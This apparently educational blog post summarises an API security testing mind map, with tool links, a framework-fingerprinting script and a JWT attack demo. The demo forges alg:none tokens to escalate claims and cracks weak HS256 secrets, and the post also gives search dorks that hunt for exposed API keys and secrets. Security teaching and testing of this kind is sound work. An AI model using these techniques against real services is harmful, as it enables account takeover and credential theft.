API security has been a hot topic lately, and a while ago I came across an API security mind map on Twitter that seemed very comprehensive, so I'm summarizing it briefly here.
API Security
I. Framework identification
1. Types of API frameworks
(1) REST APIs
RESTful, OData
(2) GraphQL
A testing project for GraphQL:
https://github.com/nicholasaleks/graphql-threat-matrix
(3) SOAP
SOAP is the familiar one, usually called WebService; open-source service frameworks include Apache CXF and Apache Axis 1/2.
(4) XML-RPC
Transmits data in a simpler XML format; it readily brings to mind the Apache OFBiz XML-RPC deserialization vulnerability.
(5) JSON-RPC
Transmits data formatted as JSON.
(6) gRPC-Protobuf
Identifiable from HTTP headers: the Content-Type (application/grpc and its variants) and the Access-Control-Expose-Headers response header, which gRPC-Web uses to expose grpc-status and grpc-message.
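As an added illustration (not part of the original mind map or of this post), the identification hints above can be turned into a small fingerprinting routine that runs offline over saved traffic. The sample exchanges are constructed for the demonstration; the markers it keys on are the ones named in this section plus a few well-known ones (the application/grpc Content-Type, the SOAPAction header and soap Envelope root, methodCall/methodResponse roots for XML-RPC, the "jsonrpc": "2.0" member, the OData-Version header and $metadata path, and swagger/openapi keys in a spec document):

```python
import json
import re

# Constructed sample exchanges (request path, response headers, response body)
# standing in for captured traffic; none of these come from a real target.
SAMPLES = {
    "grpc":    ("/helloworld.Greeter/SayHello",
                {"Content-Type": "application/grpc+proto", "grpc-status": "0"}, ""),
    "soap":    ("/ws/Calculator", {"Content-Type": "text/xml; charset=utf-8"},
                '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
                '<soap:Body><AddResponse><result>3</result></AddResponse></soap:Body>'
                '</soap:Envelope>'),
    "xmlrpc":  ("/xmlrpc", {"Content-Type": "text/xml"},
                '<?xml version="1.0"?><methodResponse><params><param><value>'
                '<string>ok</string></value></param></params></methodResponse>'),
    "jsonrpc": ("/rpc", {"Content-Type": "application/json"},
                '{"jsonrpc":"2.0","result":19,"id":1}'),
    "graphql": ("/graphql", {"Content-Type": "application/json"},
                '{"data":{"__typename":"Query"}}'),
    "odata":   ("/odata/$metadata",
                {"Content-Type": "application/xml", "OData-Version": "4.0"},
                '<edmx:Edmx Version="4.0" xmlns:edmx="http://docs.oasis-open.org/odata/ns/edmx"/>'),
    "openapi": ("/v2/swagger.json", {"Content-Type": "application/json"},
                '{"swagger":"2.0","paths":{}}'),
    "rest":    ("/api/v1/users/1", {"Content-Type": "application/json"},
                '{"id":1,"name":"alice"}'),
}


def identify_api(path, headers, body):
    """Return the list of API styles one request/response most likely belongs to.

    path:    request path (e.g. "/graphql")
    headers: response headers (any key case)
    body:    response body as text ("" when binary)
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").lower()
    expose = h.get("access-control-expose-headers", "").lower()
    hits = []

    # gRPC / gRPC-Web: binary protobuf frames, so identify purely from headers
    if ctype.startswith("application/grpc") or "grpc-status" in expose:
        hits.append("gRPC-Protobuf")

    # SOAP: 1.1 uses text/xml + SOAPAction, 1.2 uses application/soap+xml;
    # either way the body root is an Envelope element
    if ("application/soap+xml" in ctype or "soapaction" in h
            or re.search(r"<(\w+:)?Envelope\b", body)):
        hits.append("SOAP")

    # XML-RPC: methodCall (request) / methodResponse (response) root elements
    if re.search(r"<method(Call|Response)>", body):
        hits.append("XML-RPC")

    # OData: the $metadata document or the OData-Version header
    if "$metadata" in path or "odata-version" in h:
        hits.append("OData")

    # JSON-based styles need a parsed body
    doc = None
    if "json" in ctype:
        try:
            doc = json.loads(body)
        except ValueError:
            doc = None
    if isinstance(doc, dict):
        if doc.get("jsonrpc") == "2.0" or ("method" in doc and "params" in doc):
            hits.append("JSON-RPC")
        # GraphQL responses carry only data / errors / extensions at the top level
        if (path.rstrip("/").endswith("/graphql")
                or (doc and set(doc) <= {"data", "errors", "extensions"})):
            hits.append("GraphQL")

    # WADL or Swagger/OpenAPI documents describe REST services
    if ("wadl" in ctype
            or ("<application" in body and "wadl" in body)
            or (isinstance(doc, dict) and ("swagger" in doc or "openapi" in doc))):
        hits.append("REST")
    if not hits and "json" in ctype:
        hits.append("REST")  # plain JSON with none of the markers above
    return hits


def fingerprint_all():
    """Run identify_api over every constructed sample; returns {name: [types]}."""
    return {name: identify_api(*sample) for name, sample in SAMPLES.items()}


if __name__ == "__main__":
    for name, types in fingerprint_all().items():
        print(f"{name:8s} -> {types}")
```

The function returns a list rather than a single label on purpose: a gateway that fronts both SOAP and REST, or a JSON-RPC endpoint reached at /graphql, will show more than one marker, and the tester should see all of them rather than a guess.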
2. Reference documents introducing the API frameworks
https://smartbear.com/blog/soap-vs-rest-whats-the-difference/
https://www.odata.org/documentation/
https://www.howtographql.com/basics/1-graphql-is-the-better-rest/
https://www.smashingmagazine.com/2016/09/understanding-rest-and-rpc-for-http-apis/
https://www.soapui.org/docs/rest-testing/working-with-rest-services/
II. URL signatures built into some frameworks
III. Black-box API information gathering
This section mainly lists tools, sites and tricks for API testing.
Tools: Burp, mitmproxy, Wireshark, APKLeaks, APKEnum, Api-Guesser, Keyhacks
Google dorks: site:target.tld inurl:api, intitle:"index of" "api.yaml" site:target.tld
WADL/WSDL: inurl:/application.wadl, user filetype:wadl, ext:wadl, user filetype:wsdl, ext:wsdl
OData: inurl:/%24metadata (the $metadata document, URL-encoded)
Github:https://github.com/search?q=target.tld+%252Bapi
https://github.com/search?q=target.tld+application.wadl&type=code
https://github.com/search?q=target.tld+*.wsdl&type=code
Other: intitle:"index of" intext:"apikey.txt" site:target.tld, allintext:"API_SECRET*" ext:env | ext:yml site:target.tld
https://github.com/dxa4481/truffleHog
https://github.com/eth0izzle/shhgit
Some API aggregation and search sites:
https://apiharmony-open.mybluemix.net/public
https://www.programmableweb.com/
https://app.swaggerhub.com/search
https://www.postman.com/explore/apis
https://smart-api.info/registry
API wordlists and enumeration tools:
IV. API endpoint testing
1. Some tools
REST APIs:https://github.com/flipkart-incubator/Astra
https://github.com/bncrypted/apidor
https://github.com/SecurityInnovation/AuthMatrix
https://github.com/PortSwigger/autorize
https://github.com/portswigger/auth-analyzer
https://github.com/ant4g0nist/Susanoo
GraphQL:https://github.com/doyensec/inql
https://gitlab.com/dee-see/graphql-path-enum
https://graphql-dashboard.herokuapp.com/
gRPC:https://github.com/trailofbits/protofuzz
2. Breaking authentication
(1) Types of identity verification
JWT testing tools: https://github.com/ticarpi/jwt_tool
https://github.com/lmammino/jwt-cracker
https://github.com/aress31/jwtcat
https://github.com/wallarm/jwt-heartbreaker
Also, a JWT checklist: https://cloud.tencent.com/developer/article/1552824
OAuth
Redirect tests: ?redirect_uri, XSS, CSRF
Basic authentication
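As an added example that is not from this post or from the JWT tools linked above, the two checks those tools automate most often (a verifier that honours alg: none, and an offline dictionary attack on a weak HS256 secret, which is what jwt-cracker does) can be reproduced with nothing but the Python standard library. The secret, the wordlist and the tokens are constructed for the demonstration; verify_vulnerable and verify_hardened are hypothetical server-side verifiers written here to contrast trusting the token's own alg header with pinning the algorithm on the server:

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Issue a token the way a server would: HMAC-SHA256 over header.payload."""
    signing_input = f"{_segment(header)}.{_segment(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_alg_none(token: str, new_claims: dict) -> str:
    """Attacker step: set alg to none, rewrite claims, and send an empty signature."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    header["alg"] = "none"
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return f"{_segment(header)}.{_segment(payload)}."


def verify_vulnerable(token: str, secret: bytes):
    """Hypothetical verifier that trusts the token's own alg header (the classic bug)."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":                 # unsigned tokens are accepted as-is
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, secret: bytes):
    """Hypothetical verifier that pins HS256 server-side and ignores the header's alg."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":                # anything else is rejected outright
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, wordlist):
    """Offline dictionary attack on the HMAC secret; returns the secret or None."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    signing_input = f"{h}.{p}".encode()
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def demo():
    """Run both checks against a constructed token and return the outcomes."""
    secret = b"secret123"                           # constructed weak secret
    token = sign_hs256({"alg": "HS256", "typ": "JWT"},
                       {"sub": "user1", "role": "user"}, secret)
    forged = forge_alg_none(token, {"role": "admin"})
    return {
        "legit_ok": verify_hardened(token, secret) is not None,
        "vulnerable_accepts_forged": verify_vulnerable(forged, secret),
        "hardened_accepts_forged": verify_hardened(forged, secret),
        "cracked_secret": crack_hs256(token, ["password", "admin", "letmein", "secret123"]),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Against a real target the same flow is: capture a legitimate token, try the alg: none variant (and its case variations, which jwt_tool also generates), then run the original token through a wordlist; a hit on either means the token can be minted for any subject.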
3. Other test items